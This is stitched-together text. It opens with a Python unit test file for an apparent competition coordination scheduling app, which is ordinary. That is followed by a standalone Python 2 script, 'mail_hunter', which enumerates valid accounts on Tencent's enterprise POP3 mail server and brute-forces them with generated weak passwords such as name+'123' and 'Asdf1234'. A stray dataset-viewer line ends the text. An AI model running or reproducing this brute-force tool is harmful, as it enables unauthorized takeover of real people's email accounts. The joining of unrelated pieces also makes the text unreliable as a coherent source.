self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/call_team', headers=headers,
data=json.dumps({'team': 'FRA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['FRA', 'IND', 'CHN', 'ENG'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 0)
resp = json.loads(client.post('/table/T2/call_team', headers=headers,
data=json.dumps({'team': 'IND'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'FRA', 'CHN', 'ENG'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 0)
resp = json.loads(client.post('/table/T2/switch_to_vacant', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 3)
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'FRA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN', 'ENG'])
# Testing skip_to_next.
resp = json.loads(client.post('/table/T1/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You can not skip to call the next team if you are not calling.')
resp = json.loads(client.post('/table/T2/switch_to_calling', headers=headers,).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 0)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['CHN', 'IND', 'ENG'])
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'ENG'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'IND'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True and
resp['message'] == 'There is only a team to correct yet.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'CHN'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True and
resp['message'] == 'There are no teams to correct.')
def test_views_table_get(self):
cohmo.app.config['START_TIME'] = 0 # past
cohmo.app.config['MAXIMUM_TIME'] = int(time.time()) + 3600*100 #future
cohmo.app.config['BREAK_TIMES'] = []
cohmo.app.config['MINIMUM_DURATION'] = 1
cohmo.app.config['NUM_SIGN_CORR'] = 2
cohmo.app.config['APRIORI_DURATION'] = 3
cohmo.views.init_chief()
client = cohmo.app.test_client()
# Testing get_queue.
resp = json.loads(client.get('/table/T1/get_queue').data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND'])
# Testing get_all.
resp = json.loads(client.get('/table/T1/get_all').data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data, {'name': 'T2', 'problem': '3',
'coordinators': ['Franco Anselmi', 'Antonio Cannavaro'],
'queue': ['ITA', 'ENG', 'IND'],
'status': 2,
'current_coordination_start_time': None,
'current_coordination_team': None,
'expected_duration': 4.0})
# Testing tables get_all.
resp = json.loads(client.get('/tables/get_all',
data=json.dumps({})).data)
self.assertTrue('ok' in resp and resp['ok'])
self.assertEqual(len(json.loads(resp['tables'])), 4)
self.assertEqual(resp['changed'], True)
last_update = resp['last_update']
resp = json.loads(client.get('/tables/get_all',
query_string = {'last_update': last_update}).data)
self.assertTrue('ok' in resp and resp['ok'])
self.assertFalse(resp['changed'])
resp = json.loads(client.get('/tables/get_all',
query_string = {'last_update': last_update-1}).data)
self.assertTrue('ok' in resp and resp['ok'])
self.assertEqual(len(json.loads(resp['tables'])), 4)
self.assertEqual(resp['changed'], True)
def test_views_history(self):
cohmo.views.init_chief()
cohmo.views.init_authentication_manager()
client = cohmo.app.test_client()
headers = self.headers
# Testing history_add.
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'pippo': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a table.')
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'team': 'ITA',
'table': 'T8'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a start time.')
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'team': 'ITA',
'table': 'T8',
'start_time': 10})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify an end time.')
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'team': 'ITA',
'table': 'T8',
'start_time': 10,
'end_time': 25})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
# Testing history_delete.
resp = json.loads(client.post('/history/delete', headers=headers,
data=json.dumps({'pippo': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a correction id.')
resp = json.loads(client.post('/history/delete', headers=headers,
data=json.dumps({'correction_id': 'ID2'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
# Testing history_get_corrections.
resp = json.loads(client.get('/history/get_corrections',
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify filters.')
resp = json.loads(client.get('/history/get_corrections',
data=json.dumps({'filters': {'team':'USA'}})).data)
self.assertTrue('ok' in resp and resp['ok'] == True and
'corrections' in resp and len(resp['corrections']) == 1)
correction = resp['corrections'][0]
self.assertEqual(correction, {'team': 'USA', 'table': 'T2',
'start_time': 5, 'end_time': 10,
'id': 'ID1'})
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/python
#coding:utf-8
'''
mail_hunter for brute mail weakpass
'''
import poplib
import argparse
import time
import os
def tencent(usernames,suffix):
server="pop.exmail.qq.com"
try:
pop = poplib.POP3_SSL(server,995)
welcome = pop.getwelcome()
print welcome
pop.quit()
except (poplib.error_proto):
print "No Response"
users=[]
with open(usernames,'rb') as userFile:
while True:
user=userFile.readline().strip()
if user=='':
break
# users.append(user+'@'+suffix)
users.append(user)
for i in range(0,len(users)):
name=users[i].split('@')[0]
temp=users[i].split('@')[1]
try:
pop=poplib.POP3_SSL(server,995)
pop.user(users[i])
auth=pop.pass_(name)
if auth=="+OK":
pop.quit()
print "\n"+"[SUCCESS]:"+users[i]+'-----'+name+'\n'
else:
pop.quit()
sleepsometime()
except Exception,e:
e=str(e).decode('gbk')
if e.count(u'密码错误或者')>0:
print users[i]+"---"+"exists brute for passwd"
domain_local=temp.split('.')[0]
passwds=[]
passwds.append(domain_local+'@123')
weak_value=['Asdf1234','Qwer1234','Abcd1234','a123456',name[0].upper()+name[1:]+'123',name+'123',name+'1234']
passwds.extend(weak_value)
if len(domain_local)<4:
passwds.append(domain_local+'1234')
passwds.append(domain_local[0].upper+domain_local[1:]+'1234')
else:
passwds.append(domain_local+'123')
passwds.append(domain_local[0].upper()+domain_local[1:]+'123')
for passwd in passwds:
try:
pop=poplib.POP3_SSL(server,995)
print "[try]"+users[i]+'----'+passwd
pop.user(users[i])
auth=pop.pass_(passwd)
#mm=str(auth).decode('gbk')
#print "this is auth:"+mm
if auth=="+OK":
pop.quit()
print "\n"+"[SUCCESS]:"+users[i]+'-----'+passwd+'\n'
break
else:
pop.quit()
sleepsometime()
except Exception,e:
sleepsometime()
pass
else:
print users[i]+'---',
print e
def sleepsometime():
time.sleep(5)
if __name__=="__main__":
parser=argparse.ArgumentParser()
parser.add_argument('-u','--username',dest='username',help='wordlist of username',required=True)
# parser.add_argument('-s','--suffix',dest='suffix',help='suffix of mail',required=True)
arg=parser.parse_args()
usernames=arg.username
# suffix=arg.suffix
tencent(usernames,'suffix')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.